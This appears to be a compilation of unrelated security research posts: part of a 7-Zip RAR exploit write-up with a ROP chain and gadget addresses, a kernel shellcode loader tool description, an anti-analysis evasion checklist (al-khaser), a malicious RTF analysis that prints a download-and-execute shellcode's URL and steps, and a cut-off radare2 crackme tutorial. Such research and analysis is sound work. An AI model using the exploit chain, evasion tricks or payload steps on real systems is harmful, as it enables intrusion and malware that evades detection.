Okay, so this method will always terminate the string with a null byte. Moreover, we see that AStringkeeps the same underlying buffer, unless it is too small to hold the desired string. This gives rise to the following idea: Assume we want to write the hex-bytes DEAD00BEEF00BAAD00 to some heap-allocated buffer. Then we will just have an archive with items that have the following names (in the listed order):

  3. DEAD

Basically, we let the method SetFrom write all null bytes we need. Note that we have replaced all null bytes in our data with some arbitrary non-zero byte (0x55 in this example), ensuring that the full string is written to the buffer.

This works reasonably well, and we can use this to write arbitrary sequences of bytes, with two small limitations. First, we have to end our sequence with a null byte. Second, we cannot have too many null bytes in our byte sequence, because this will cause a quadratic blow-up of the archive size. Luckily, we can easily work with those restrictions in our specific case.

Finally, note that we can make essentially two types of allocations:

  • Allocations with items such that item.IgnoreItem()==true. Those items will not be added to the list _items, and are hence only temporary. These allocations have the property that they will be freed eventually, and they can (using the above technique) be filled with almost arbitrary sequences of bytes. Since these allocations are all made via the same stack-allocated object item and hence use the same AString object, the allocation sizes of this type need to be strictly increasing in their size. We will use this allocation type mainly to put the replacement object on the heap.
  • Allocations with items such that item.IgnoreItem()==false. Those items will be added to the list _items, causing a copy of the corresponding name. This is useful in particular to cause many pending allocations of certain sizes in order to activate LFH. Note that the copied string cannot contain any null bytes, which is fine for our purposes.

Combining the outlined methods carefully, we can construct an archive that implements the heap allocation strategy from the previous section.


We leverage the lack of ASLR on the main executable 7zG.exe to bypass DEP with a ROP chain. 7-Zip never calls VirtualProtect, so we read the addresses of VirtualAllocmemcpy, and exit from the Import Address Table to write the following ROP chain:

// pivot stack: xchg rax, rsp;
exec_buffer = VirtualAlloc(NULL, 0x1000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec_buffer, rsp+shellcode_offset, 0x1000);
jmp exec_buffer;

Since we are running on x86_64 (where most instructions have a longer encoding than in x86) and the binary is not very large, for some of the operations we want to execute there are no neat gadgets. This is not really a problem, but it makes the ROP chain somewhat ugly. For example, in order to set the register R9 to PAGE_EXECUTE_READWRITE before calling VirtualAlloc, we use the following chain of gadgets:

0x40691e, #pop rcx; add eax, 0xfc08500; xchg eax, ebp; ret; 
PAGE_EXECUTE_READWRITE, #value that is popped into rcx
0x401f52, #xor eax, eax; ret; (setting ZF=1 for cmove)
0x4193ad, #cmove r9, rcx; imul rax, rdx; xor edx, edx; imul rax, rax, 0xf4240; div r8; xor edx, edx; div r9; ret; 


The following demo video briefly presents the exploit running on a freshly installed and fully updated Windows 10 RS4 (Build 17134.1) 64-bit with 7-Zip 18.01 x64. As mentioned above, the targeted exploitation scenario is extraction via the context menu 7-Zip->Extract Here and 7-Zip->Extract to subfolder.

On Reliability

After some fine-tuning of the auxiliary heap allocation sizes, the exploit seems to work very reliably.

In order to obtain more information on reliability, I wrote a small script that repeatedly calls the binary 7zG.exe the same way it would be called when extracting the crafted archive via the context menu. Moreover, the script checks that calc.exe is actually started and the process 7zG.exe exits with code 0. Running the script on different Windows operating systems (all fully updated), the results are as follows:

  • Windows 10 RS4 (Build 17134.1) 64-bit: the exploit failed5 17 out of 100 000 times.
  • Windows 8.1 64-bit: the exploit failed 12 out of 100 000 times.
  • Windows 7 SP1 64-bit: the exploit failed 90 out of 100 000 times.

Note that across all operating systems, the very same crafted archive is used. This works well, presumably because most changes between the Windows 7 and Windows 10 heap implementation affect the Low Fragmentation Heap, whereas the rest has not changed too much. Moreover, the LFH is still triggered for the same number of pending allocations.

Admittedly, it is not really possible to determine the reliability of an exploit empirically. Still, I believe this to be better than “I ran it a few times, and it seems to be reliable”.


In my opinion, this bug is a consequence of the design (partially) inherited from UnRAR. If a class depends on its clients to use it correctly in order to prevent usage of uninitialized class members, you are doomed for failure.

We have seen how this (at first glance) innocent looking bug can be turned into a reliable weaponized code execution exploit. Due to the lack of ASLR on the main executables, the only difficult part of the exploit was to carry out the heap massaging within the restricted context of RAR extraction.

Fortunately, the new 7-Zip 18.05 not only resolves the bug, but also comes with enabled ASLR on all the main executables.

Timeline of Disclosure

  • 2018-03-06 — Discovery
  • 2018-03-06 — Report
  • 2018-04-14 — MITRE assigned CVE-2018-10115
  • 2018-04-30 — 7-Zip 18.05 released, fixing CVE-2018-10115 and enabling ASLR on the executables.

Loading Kernel Shellcode

In the wake of recent hacking tool dumps, the FLARE team saw a spike in malware samples detonating kernel shellcode. Although most samples can be analyzed statically, the FLARE team sometimes debugs these samples to confirm specific functionality. Debugging can be an efficient way to get around packing or obfuscation and quickly identify the structures, system routines, and processes that a kernel shellcode sample is accessing.

This post begins a series centered on kernel software analysis, and introduces a tool that uses a custom Windows kernel driver to load and execute Windows kernel shellcode. I’ll walk through a brief case study of some kernel shellcode, how to load shellcode with FLARE’s kernel shellcode loader, how to build your own copy, and how it works.

As always, only analyze malware in a safe environment such as a VM; never use tools such as a kernel shellcode loader on any system that you rely on to get your work done.

A Tale of Square Pegs and Round Holes

Depending upon how a shellcode sample is encountered, the analyst may not know whether it is meant to target user space or kernel space. A common triage step is to load the sample in a shellcode loader and debug it in user space. With kernel shellcode, this can have unexpected results such as the access violation in Figure 1.

Figure 1: Access violation from shellcode dereferencing null pointer

The kernel environment is a world apart from user mode: various registers take on different meanings and point to totally different structures. For instance, while the gs segment register in 64-bit Windows user mode points to the Thread Information Block (TIB) whose size is only 0x38 bytes, in kernel mode it points to the Processor Control Region (KPCR) which is much larger. In Figure 1 at address 0x2e07d9, the shellcode is attempting to access the IdtBase member of the KPCR, but because it is running in user mode, the value at offset 0x38 from the gs segment is null. This causes the next instruction to attempt to access invalid memory in the NULL page. What the code is trying to do doesn’t make sense in the user mode environment, and it has crashed as a result.

In contrast, kernel mode is a perfect fit. Figure 2 shows WinDbg’s dt command being used to display the _KPCR type defined within ntoskrnl.pdb, highlighting the field at offset 0x38 named IdtBase.

Figure 2: KPCR structure

Given the rest of the code in this sample, accessing the IdtBase field of the KPCR made perfect sense. Determining that this was kernel shellcode allowed me to quickly resolve the rest of my questions, but to confirm my findings, I wrote a kernel shellcode loader. Here’s what it looks like to use this tool to load a small, do-nothing piece of shellcode.

Using FLARE’s Kernel Shellcode Loader

I booted a target system with a kernel debugger and opened an administrative command prompt in the directory where I copied the shellcode loader (kscldr.exe). The shellcode loader expects to receive the name of the file on disk where the shellcode is located as its only argument. Figure 3 shows an example where I’ve used a hex editor to write the opcodes for the NOP (0x90) and RET (0xC3) instructions into a binary file and invoked kscldr.exe to pass that code to the kernel shellcode loader driver. I created my file using the Windows port of xxd that comes with Vim for Windows.

Figure 3: Using kscldr.exe to load kernel shellcode

The shellcode loader prompts with a security warning. After clicking yes, kscldr.exe installs its driver and uses it to execute the shellcode. The system is frozen at this point because the kernel driver has already issued its breakpoint and the kernel debugger is awaiting commands. Figure 4 shows WinDbg hitting the breakpoint and displaying the corresponding source code for kscldr.sys.

Figure 4: Breaking in kscldr.sys

From the breakpoint, I use WinDbg with source-level debugging to step and trace into the shellcode buffer. Figure 5 shows WinDbg’s disassembly of the buffer after doing this.

Figure 5: Tracing into and disassembling the shellcode

The disassembly shows the 0x90 and 0xc3 opcodes from before, demonstrating that the shellcode buffer is indeed being executed. From here, the powerful facilities of WinDbg are available to debug and analyze the code’s behavior.

Building It Yourself

To try out FLARE’s kernel shellcode loader for yourself, you’ll need to download the source code.

To get started building it, download and install the Windows Driver Kit (WDK). I’m using Windows Driver Kit Version 7.1.0, which is command line driven, whereas more modern versions of the WDK integrate with Visual Studio. If you feel comfortable using a newer kit, you’re welcomed to do so, but beware, you’ll have to take matters into your own hands regarding build commands and dependencies. Since WDK 7.1.0 is adequate for purposes of this tool, that is the version I will describe in this post.

Once you have downloaded and installed the WDK, browse to the Windows Driver Kits directory in the start menu on your development system and select the appropriate environment. Figure 6 shows the WDK program group on a Windows 7 system. The term “checked build” indicates that debugging checks will be included. I plan to load 64-bit kernel shellcode, and I like having Windows catch my mistakes early, so I’m using the x64 Checked Build Environment.

Figure 6: Windows Driver Kits program group

In the WDK command prompt, change to the directory where you downloaded the FLARE kernel shellcode loader and type ez.cmd. The script will cause prompts to appear asking you to supply and use a password for a test signing certificate. Once the build completes, visit the bin directory and copy kscldr.exe to your debug target. Before you can commence using your custom copy of this tool, you’ll need to follow just a few more steps to prepare the target system to allow it.

Preparing the Debug Target

To debug kernel shellcode, I wrote a Windows software-only driver that loads and runs shellcode at privilege level 0. Normally, Windows only loads drivers that are signed with a special cross-certificate, but Windows allows you to enable testsigning to load drivers signed with a test certificate. We can create this test certificate for free, and it won’t allow the driver to be loaded on production systems, which is ideal.

In addition to enabling testsigning mode, it is necessary to enable kernel debugging to be able to really follow what is happening after the kernel shellcode gains execution. Starting with Windows Vista, we can enable both testsigning and kernel debugging by issuing the following two commands in an administrative command prompt followed by a reboot:

bcdedit.exe /set testsigning on

bcdedit.exe /set debug on

For debugging in a VM, I install VirtualKD, but you can also follow your virtualization vendor’s directions for connecting a serial port to a named pipe or other mechanism that WinDbg understands. Once that is set up and tested, we’re ready to go!

If you try the shellcode loader and get a blue screen indicating stop code 0x3B (SYSTEM_SERVICE_EXCEPTION), then you likely did not successfully connect the kernel debugger beforehand. Remember that the driver issues a software interrupt to give control to the debugger immediately before executing the shellcode; if the debugger is not successfully attached, Windows will blue screen. If this was the case, reboot and try again, this time first confirming that the debugger is in control by clicking Debug -> Break in WinDbg. Once you know you have control, you can issue the g command to let execution continue (you may need to disable driver load notifications to get it to finish the boot process without further intervention: sxd ld).

How It Works

The user-space application (kscldr.exe) copies the driver from a PE-COFF resource to the disk and registers it as a Windows kernel service. The driver implements device write and I/O control routines to allow interaction from the user application. Its driver entry point first registers dispatch routines to handle CreateFile, WriteFile, DeviceIoControl, and CloseHandle. It then creates a device named \Device\kscldr and a symbolic link making the device name accessible from user-space. When the user application opens the device file and invokes WriteFile, the driver calls ExAllocatePoolWithTag specifying a PoolType of NonPagedPool (which is executable), and writes the buffer to the newly allocated memory. After the write operation, the user application can call DeviceIoControl to call into the shellcode. In response, the driver sets the appropriate flags on the device object, issues a breakpoint to pass control to the kernel debugger, and finally calls the shellcode as if it were a function.

While You’re Here

Driver development opens the door to unique instrumentation opportunities. For example, Figure 7 shows a few kernel callback routines described in the WDK help files that can track system-wide process, thread, and DLL activity.

Figure 7: WDK kernel-mode driver architecture reference

Kernel development is a deep subject that entails a great deal of study, but the WDK also comes with dozens upon dozens of sample drivers that illustrate correct Windows kernel programming techniques. This is a treasure trove of Windows internals information, security research topics, and instrumentation possibilities. If you have time, take a look around before you get back to work.


We’ve shared FLARE’s tool for loading privileged shellcode in test environments so that we can dynamically analyze kernel shellcode. We hope this provides a straightforward way to quickly triage kernel shellcode if it ever appears in your environment. Download the source code now.

Anti-VM techniques — Hyper-V/VPC registry key + WMI queries on Win32_BIOS, Win32_ComputerSystem, MSAcpi_ThermalZoneTemperature, more MAC for Xen, Parallels


al-khaser is a PoC «malware» application with good intentions that aims to stress your anti-malware system. It performs a bunch of common malware tricks with the goal of seeing if you stay under the radar.



You can download the latest release here.

Possible uses

  • You are making an anti-debug plugin and you want to check its effectiveness.
  • You want to ensure that your sandbox solution is hidden enough.
  • Or you want to ensure that your malware analysis environment is well hidden.

Please, if you encounter any of the anti-analysis tricks which you have seen in a malware, don’t hesitate to contribute.


Anti-debugging attacks

  • IsDebuggerPresent
  • CheckRemoteDebuggerPresent
  • Process Environement Block (BeingDebugged)
  • Process Environement Block (NtGlobalFlag)
  • ProcessHeap (Flags)
  • ProcessHeap (ForceFlags)
  • NtQueryInformationProcess (ProcessDebugPort)
  • NtQueryInformationProcess (ProcessDebugFlags)
  • NtQueryInformationProcess (ProcessDebugObject)
  • NtSetInformationThread (HideThreadFromDebugger)
  • NtQueryObject (ObjectTypeInformation)
  • NtQueryObject (ObjectAllTypesInformation)
  • CloseHanlde (NtClose) Invalide Handle
  • SetHandleInformation (Protected Handle)
  • UnhandledExceptionFilter
  • OutputDebugString (GetLastError())
  • Hardware Breakpoints (SEH / GetThreadContext)
  • Software Breakpoints (INT3 / 0xCC)
  • Memory Breakpoints (PAGE_GUARD)
  • Interrupt 0x2d
  • Interrupt 1
  • Parent Process (Explorer.exe)
  • SeDebugPrivilege (Csrss.exe)
  • NtYieldExecution / SwitchToThread
  • TLS callbacks
  • Process jobs
  • Memory write watching


  • Erase PE header from memory
  • SizeOfImage

Timing Attacks [Anti-Sandbox]

  • RDTSC (with CPUID to force a VM Exit)
  • RDTSC (Locky version with GetProcessHeap & CloseHandle)
  • Sleep -> SleepEx -> NtDelayExecution
  • Sleep (in a loop a small delay)
  • Sleep and check if time was accelerated (GetTickCount)
  • SetTimer (Standard Windows Timers)
  • timeSetEvent (Multimedia Timers)
  • WaitForSingleObject -> WaitForSingleObjectEx -> NtWaitForSingleObject
  • WaitForMultipleObjects -> WaitForMultipleObjectsEx -> NtWaitForMultipleObjects (todo)
  • IcmpSendEcho (CCleaner Malware)
  • CreateWaitableTimer (todo)
  • CreateTimerQueueTimer (todo)
  • Big crypto loops (todo)

Human Interaction / Generic [Anti-Sandbox]

  • Mouse movement
  • Total Physical memory (GlobalMemoryStatusEx)
  • Disk size using DeviceIoControl (IOCTL_DISK_GET_LENGTH_INFO)
  • Disk size using GetDiskFreeSpaceEx (TotalNumberOfBytes)
  • Mouse (Single click / Double click) (todo)
  • DialogBox (todo)
  • Scrolling (todo)
  • Execution after reboot (todo)
  • Count of processors (Win32/Tinba — Win32/Dyre)
  • Sandbox known product IDs (todo)
  • Color of background pixel (todo)
  • Keyboard layout (Win32/Banload) (todo)

Anti-Virtualization / Full-System Emulation

  • Registry key value artifacts
    • HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 (Identifier) (VBOX)
    • HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 (Identifier) (QEMU)
    • HARDWARE\Description\System (SystemBiosVersion) (VBOX)
    • HARDWARE\Description\System (SystemBiosVersion) (QEMU)
    • HARDWARE\Description\System (VideoBiosVersion) (VIRTUALBOX)
    • HARDWARE\Description\System (SystemBiosDate) (06/23/99)
    • HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 (Identifier) (VMWARE)
    • HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0 (Identifier) (VMWARE)
    • HARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0 (Identifier) (VMWARE)
    • SYSTEM\ControlSet001\Control\SystemInformation (SystemManufacturer) (VMWARE)
    • SYSTEM\ControlSet001\Control\SystemInformation (SystemProductName) (VMWARE)
  • Registry Keys artifacts
    • SOFTWARE\Oracle\VirtualBox Guest Additions (VBOX)
    • SYSTEM\ControlSet001\Services\VBoxGuest (VBOX)
    • SYSTEM\ControlSet001\Services\VBoxMouse (VBOX)
    • SYSTEM\ControlSet001\Services\VBoxService (VBOX)
    • SYSTEM\ControlSet001\Services\VBoxSF (VBOX)
    • SYSTEM\ControlSet001\Services\VBoxVideo (VBOX)
    • SOFTWARE\VMware, Inc.\VMware Tools (VMWARE)
    • SOFTWARE\Wine (WINE)
    • SOFTWARE\Microsoft\Virtual Machine\Guest\Parameters (HYPER-V)
  • File system artifacts
    • «system32\drivers\VBoxMouse.sys»
    • «system32\drivers\VBoxGuest.sys»
    • «system32\drivers\VBoxSF.sys»
    • «system32\drivers\VBoxVideo.sys»
    • «system32\vboxdisp.dll»
    • «system32\vboxhook.dll»
    • «system32\vboxmrxnp.dll»
    • «system32\vboxogl.dll»
    • «system32\vboxoglarrayspu.dll»
    • «system32\vboxoglcrutil.dll»
    • «system32\vboxoglerrorspu.dll»
    • «system32\vboxoglfeedbackspu.dll»
    • «system32\vboxoglpackspu.dll»
    • «system32\vboxoglpassthroughspu.dll»
    • «system32\vboxservice.exe»
    • «system32\vboxtray.exe»
    • «system32\VBoxControl.exe»
    • «system32\drivers\vmmouse.sys»
    • «system32\drivers\vmhgfs.sys»
    • «system32\drivers\vm3dmp.sys»
    • «system32\drivers\vmci.sys»
    • «system32\drivers\vmhgfs.sys»
    • «system32\drivers\vmmemctl.sys»
    • «system32\drivers\vmmouse.sys»
    • «system32\drivers\vmrawdsk.sys»
    • «system32\drivers\vmusbmouse.sys»
  • Directories artifacts
    • «%PROGRAMFILES%\oracle\virtualbox guest additions\»
    • «%PROGRAMFILES%\VMWare\»
  • Memory artifacts
    • Interupt Descriptor Table (IDT) location
    • Local Descriptor Table (LDT) location
    • Global Descriptor Table (GDT) location
    • Task state segment trick with STR
  • MAC Address
    • «\x08\x00\x27» (VBOX)
    • «\x00\x05\x69» (VMWARE)
    • «\x00\x0C\x29» (VMWARE)
    • «\x00\x1C\x14» (VMWARE)
    • «\x00\x50\x56» (VMWARE)
    • «\x00\x1C\x42» (Parallels)
    • «\x00\x16\x3E» (Xen)
  • Virtual devices
    • «\\.\VBoxMiniRdrDN»
    • «\\.\VBoxGuest»
    • «\\.\pipe\VBoxMiniRdDN»
    • «\\.\VBoxTrayIPC»
    • «\\.\pipe\VBoxTrayIPC»)
    • «\\.\HGFS»
    • «\\.\vmci»
  • Hardware Device information
    • SetupAPI SetupDiEnumDeviceInfo (GUID_DEVCLASS_DISKDRIVE)
      • QEMU
      • VMWare
      • VBOX
      • VIRTUAL HD
  • System Firmware Tables
    • SMBIOS string checks (VirtualBox)
    • SMBIOS string checks (VMWare)
    • SMBIOS string checks (Qemu)
    • ACPI string checks (VirtualBox)
    • ACPI string checks (VMWare)
    • ACPI string checks (Qemu)
  • Driver Services
    • VirtualBox
    • VMWare
  • Adapter name
    • VMWare
  • Windows Class
    • VBoxTrayToolWndClass
    • VBoxTrayToolWnd
  • Network shares
    • VirtualBox Shared Folders
  • Processes
    • vboxservice.exe (VBOX)
    • vboxtray.exe (VBOX)
    • vmtoolsd.exe(VMWARE)
    • vmwaretray.exe(VMWARE)
    • vmwareuser(VMWARE)
    • VGAuthService.exe (VMWARE)
    • vmacthlp.exe (VMWARE)
    • vmsrvc.exe(VirtualPC)
    • vmusrvc.exe(VirtualPC)
    • prl_cc.exe(Parallels)
    • prl_tools.exe(Parallels)
    • xenservice.exe(Citrix Xen)
    • qemu-ga.exe (QEMU)
  • WMI
    • SELECT * FROM Win32_Bios (SerialNumber) (GENERIC)
    • SELECT * FROM Win32_PnPEntity (DeviceId) (VBOX)
    • SELECT * FROM Win32_NetworkAdapterConfiguration (MACAddress) (VBOX)
    • SELECT * FROM Win32_NTEventlogFile (VBOX)
    • SELECT * FROM Win32_Processor (NumberOfCores) (GENERIC)
    • SELECT * FROM Win32_LogicalDisk (Size) (GENERIC)
    • SELECT * FROM Win32_Computer (Model and Manufacturer) (GENERIC)
    • SELECT * FROM MSAcpi_ThermalZoneTemperature CurrentTemperature) (GENERIC)
  • DLL Exports and Loaded DLLs
    • avghookx.dll (AVG)
    • avghooka.dll (AVG)
    • snxhk.dll (Avast)
    • kernel32.dll!wine_get_unix_file_nameWine (Wine)
    • sbiedll.dll (Sandboxie)
    • dbghelp.dll (MS debugging support routines)
    • api_log.dll (iDefense Labs)
    • dir_watch.dll (iDefense Labs)
    • pstorec.dll (SunBelt Sandbox)
    • vmcheck.dll (Virtual PC)
    • wpespy.dll (WPE Pro)
  • CPU
    • Hypervisor presence using (EAX=0x1)
    • Hypervisor vendor using (EAX=0x40000000)
      • «KVMKVMKVM\0\0\0» (KVM)
        • «Microsoft Hv»(Microsoft Hyper-V or Windows Virtual PC)
        • «VMwareVMware»(VMware)
        • «XenVMMXenVMM»(Xen)
        • «prl hyperv «( Parallels) -«VBoxVBoxVBox»( VirtualBox)


  • Processes
    • OllyDBG / ImmunityDebugger / WinDbg / IDA Pro
    • SysInternals Suite Tools (Process Explorer / Process Monitor / Regmon / Filemon, TCPView, Autoruns)
    • Wireshark / Dumpcap
    • ProcessHacker / SysAnalyzer / HookExplorer / SysInspector
    • ImportREC / PETools / LordPE
    • JoeBox Sandbox

Macro malware attacks

  • Document_Close / Auto_Close.
  • Application.RecentFiles.Count

Code/DLL Injections techniques

  • CreateRemoteThread
  • SetWindowsHooksEx
  • NtCreateThreadEx
  • RtlCreateUserThread
  • APC (QueueUserAPC / NtQueueApcThread)
  • RunPE (GetThreadContext / SetThreadContext)



CVE-2017–11882 RTF — Full description

Two weeks ago a malicious MS Word document was blocked from a sandbox (SHA 256 — 1aca3bcf3f303624b8d7bcf7ba7ce284cf06b0ca304782180b6b9b973f4ffdd7).The sample looked interesting because by that time, VirusTotal had a limited detection rate. Both VirusTotal and Any.Run identified the sample as CVE-2017–11882, one of the infamous Equation Editor exploits. Let’s take a look.

Looking for an OLE

RTF is a quite complex structure by it self. On top of that, adversaries add additional obfuscation layers to prevent both analysts and various analysis tools to detect the malicious objects.

RTF Hide & Seek

Firing up oletools/rtfobj and Didier’s rtdump, looking for OLE objects did not result to anything useful.


No OLE objects detected to rtfdump

You can find a list about RTF obfuscation in the links below:

Unfortunately those didn’t help to find an OLE object, so we just looked for “d0cf” (OLE Compound header identifier) where one instance came up

One OLE object instance identified

Analyzing the OLE

Apparently this OLE object has a CLSID of “0002ce02–0000–0000-c000–000000000046” which indicates that the OLE object is related to Equation Editor and to the exploit itself. Additionally one OLE Native Stream was identified (instead of an Equation Native stream).

CLSID related to Equation Editor
OLE Native Stream

How OLE Native Stream is related? Cofense has posted a relevant article.

The OLENativeStream is an OLE2.0 stream object contained within an OLE Compound File Storage (MS-CFB) object and contains only one header field, a 4-byte NativeDataSize field

Return to stack

The native stream is 0x795 (1945)bytes long. After that offset the actual content follows. One can guess, that the next 4 bytes, starting from 02 AB 01 E7 are related to Equation Editor MTEF header (given that no Equation Native Stream exists). You can find a good analysis of MTEF here. The header consists of 5 bytes, where the first one should be 0x03. Apparently the MTEF header does not play an important role (Or not?). In addition, there are two extra bytes (0xA, 0x1) which do not map on the MTEF specification. If anyone knows how to interpret those bytes please illuminate me.

Shellcode map

The most important part is the Font Record which have an ID of 0x8 and two one byte identifiers, one for typeface number an one for style (0x9D and 0x7C respectively). Following this byte sequence, the actual font name follows. Font name is stored in a buffer of 40 bytes length; 8 more are needed in order to overwrite the return address, which in our case is 0x00402157. This address belongs to a ret instruction in EQNEDT32.exe

It is well known, that this specific exploit is a stack-based buffer overflow. Our bet is that after the ret instruction, the execution returns to our shellcode. Let’s fire up Windbg.

Windbg return to stack

Prior to the ret instruction the last element in stack is our shellcode (0x0018f354). After the ret command this value will be popped to eip. We can see in the disassembly windows that we have a very clean shellcode.

Analyzing the shellcode

In order to analyze the shellcode I used shellcode2exe and fired IDA. The first call is the 0x004667b0 which is the import address of GlobalLock function call in EQNEDT32.exe which locks our shellcode in memory.

Following a sequence of jmp instructions, we end up in a xor decryption loop. The xor decryption takes place in 0x3FE offset for 0x389 length. In order to help us with the decryption, a small IDA Python script was created (forgive any Python mistakes, Python n00b here). The script can be executed by selecting the desired offset and typing run() in console line in IDA.

from binascii import hexlify
import struct
import ctypes
from ctypes import *
def run():
 startPos = 0x4013fe
 xored = 0
 index = 0
 for index in range (startPos,startPos + 0x389, 4):
  xored = xored * 0x22A76047
  xored = xored + 0x2698B12D
  for i in range (0,4):
   patched_byte = ord(struct.pack('<I',c_uint(xored).value)[i]) ^ Byte(index+i)
   PatchByte(index+i, patched_byte)

After the execution of the script, a URL appeared, therefore something good happened to us.

Bytes before and after the decryption

In the decryption loop the is a call in sub_40147e which before the decryption was meaningless, as the jmp destination was out of range.

Before the decryption

However the same function, after the decryption is totally different. You can observe a lot of dynamic call instructions, which one can bet that they are function pointers resolved by GetProcAddress

After the decryption

In order not to make the post huge and being lazy enough to continue static analysis, Windbg came into the scene. Apparently what the shellcode does, can be summarized in the following steps:

  • ExpandEnvironmentStringsW(“%APPDATA%\wwindowss.exe”,dst_path)
  • URLDownloadToFileW(“ http://reggiewaller.com/404/ac/ppre.exe”,dst_path)
  • CreateProcessW(“C:\Users\vmuser\AppData\Roaming\wwindowss.exe”)
  • ExitProcess

That’s all folks! This post and any following ones are simply a notepad, which document some basic analysis steps. Any comments or corrections are more than welcome.

In the above we presented an analysis of a malicious RTF detected by a sandbox. The RTF was exploiting the CVE-2017–11882. We tried to analyze the RTF, extracted the shellcode and analyzed it. The shellcode is a plain download & execute shellcode.

Reverse Engineering With Radare2 – Part 3

Sorry about the larger delay between the previous post and this one, but I was very busy the last weeks.
(And the technology I wanted to show wasn’t completely implemented in radare2, which means that I had to implement it on my own 😉 ). In case you’re new to this series, you’ll find the previous posts here.

As you may already know, we’ll deal with the third challenge today. The purpose for this one is to introduce
some constructs which are often used in real programs.

Let’s start like the last times by loading the binary into radare2 (r2 -AA ./challenge03).

As you may notice, the main function differs from the previous challenges:

[0x00400a04]> VV @ sym.main (nodes 4 edges 4 zoom 100%) BB-NORM mouse:canvas-y movements-speed:5
        |  0x400a04                                   |
        |   ;-- main:                                 |
        | (fcn) sym.main 115                          |
        | ; var int local_138h @ rbp-0x138            |
        | ; var int local_130h @ rbp-0x130            |
        | ; var int local_124h @ rbp-0x124            |
        | ; var int local_120h @ rbp-0x120            |
        | ; var int local_18h @ rbp-0x18              |
        | ; var int local_10h @ rbp-0x10              |
        | push rbp                                    |
        | mov rbp, rsp                                |
        | sub rsp, 0x140                              |
        | mov dword [rbp - local_124h], edi           |
        | mov qword [rbp - local_130h], rsi           |
        | mov qword [rbp - local_138h], rdx           |
        | mov eax, 0                                  |
        | call sym.banner ;[a]                        |
        | mov dword [rbp - local_120h], 0             |
        | mov qword [rbp - local_18h], obj.passwords  |
        | mov qword [rbp - local_10h], obj.passwords  |
        | lea rax, [rbp - local_120h]                 |
        | mov rdi, rax                                |
        | call sym.checkPassword ;[b]                 |
        | test al, al                                 |
        | je 0x400a66 ;[c]                            |
              t f
      .-------' '-----------------------.
      |                                 |
      |                                 |
=-------------------------=     =---------------------------------=
|  0x400a66               |     |  0x400a5a                       |
| mov edi, str.Wrong_     |     | mov edi, str.Password_accepted_ |
| call sym.imp.puts ;[d]  |     | call sym.imp.puts ;[d]          |
=-------------------------=     | jmp 0x400a70 ;[e]               |
    v                           =---------------------------------=
    |                               v
                    |  0x400a70          |
                    | mov eax, 0         |
                    | leave              |
                    | ret                |


[0x004008e3]> VV @ sym.main (nodes 4 edges 4 zoom 100%) BB-NORM mouse:canvas-y movements-speed:5
            |  0x4008e3                          |
            |   ;-- main:                        |
            | (fcn) sym.main 133                 |
            |   sym.main ();                     |
            | ; var int local_118h @ rbp-0x118   |
            | ; var int local_110h @ rbp-0x110   |
            | ; var int local_104h @ rbp-0x104   |
            | ; var int local_100h @ rbp-0x100   |
            | ; var int local_1h @ rbp-0x1       |
            | push rbp                           |
            | mov rbp, rsp                       |
            | sub rsp, 0x120                     |
            | mov dword [rbp - local_104h], edi  |
            | mov qword [rbp - local_110h], rsi  |
            | mov qword [rbp - local_118h], rdx  |
            | mov eax, 0                         |
            | call sym.banner ;[a]               |
            | mov edi, str.Enter_Password:       |
            | mov eax, 0                         |
            | call sym.imp.printf ;[b]           |
            | lea rax, [rbp - local_100h]        |
            | mov rsi, rax                       |
            | mov edi, str._255s                 |
            | mov eax, 0                         |
            | call sym.imp.__isoc99_scanf ;[c]   |
            | mov byte [rbp - local_1h], 0       |
            | lea rax, [rbp - local_100h]        |
            | mov rdi, rax                       |
            | call sym.checkPassword ;[d]        |
            | test al, al                        |
            | je 0x400957 ;[e]                   |
                  t f
      .-----------' '-------------------.
      |                                 |
      |                                 |
=-------------------------=     =---------------------------------=
|  0x400957               |     |  0x40094b                       |
| mov edi, str.Wrong_     |     | mov edi, str.Password_accepted_ |
| call sym.imp.puts ;[f]  |     | call sym.imp.puts ;[f]          |
=-------------------------=     | jmp 0x400961 ;[g]               |
    v                           =---------------------------------=
    |                               v
                    |  0x400961          |
                    | mov eax, 0         |
                    | leave              |
                    | ret                |

The second half of the function seems the same (pseudo):

int main(int argc, char **argv) {
    if(checkPassword(...)) {
        puts("Password accepted!\n");
    } else {
    return 0;

Whilst the previous challenges read the user password via scanf, this time some local variables are set.
One of them is set to zero, the other two to an address flagged as obj.passwords. As this seems very promising,
we’ll look what’s at this address (with px @ obj.passwords):

- offset -   0 1  2 3  4 5  6 7  8 9  A B  C D  E F  0123456789ABCDEF
0x00601060  080b 4000 0000 0000 100b 4000 0000 0000  ..@.......@.....
0x00601070  180b 4000 0000 0000 200b 4000 0000 0000  ..@..... .@.....
0x00601080  280b 4000 0000 0000 0000 0000 0000 0000  (.@.............
0x00601090  4743 433a 2028 474e 5529 2036 2e31 2e31  GCC: (GNU) 6.1.1
0x006010a0  2032 3031 3630 3830 3200 0000 0000 0000   20160802.......
0x006010b0  0000 0000 0000 0000 0000 0000 0000 0000  ................
0x006010c0  0000 0000 0000 0000 0000 0000 0300 0100  ................
0x006010d0  3802 4000 0000 0000 0000 0000 0000 0000  8.@.............
0x006010e0  0000 0000 0300 0200 5402 4000 0000 0000  ........T.@.....
0x006010f0  0000 0000 0000 0000 0000 0000 0300 0300  ................
0x00601100  7402 4000 0000 0000 0000 0000 0000 0000  t.@.............
0x00601110  0000 0000 0300 0400 9802 4000 0000 0000  ..........@.....
0x00601120  0000 0000 0000 0000 0000 0000 0300 0500  ................
0x00601130  0803 4000 0000 0000 0000 0000 0000 0000  ..@.............
0x00601140  0000 0000 0300 0600 4805 4000 0000 0000  ........H.@.....
0x00601150  0000 0000 0000 0000 0000 0000 0300 0700  ................

Hm, this is obviously not a list of readable strings… But if we look closer,
we can see that the values at this address could contain again addresses…
(the 2nd-7th, 10th-15th, 18th-23th, … bytes are the same and fit into valid memory regions).

As this is a 64bit binary, we’ll do the hexdump again, but this time with quadwords (pxq):

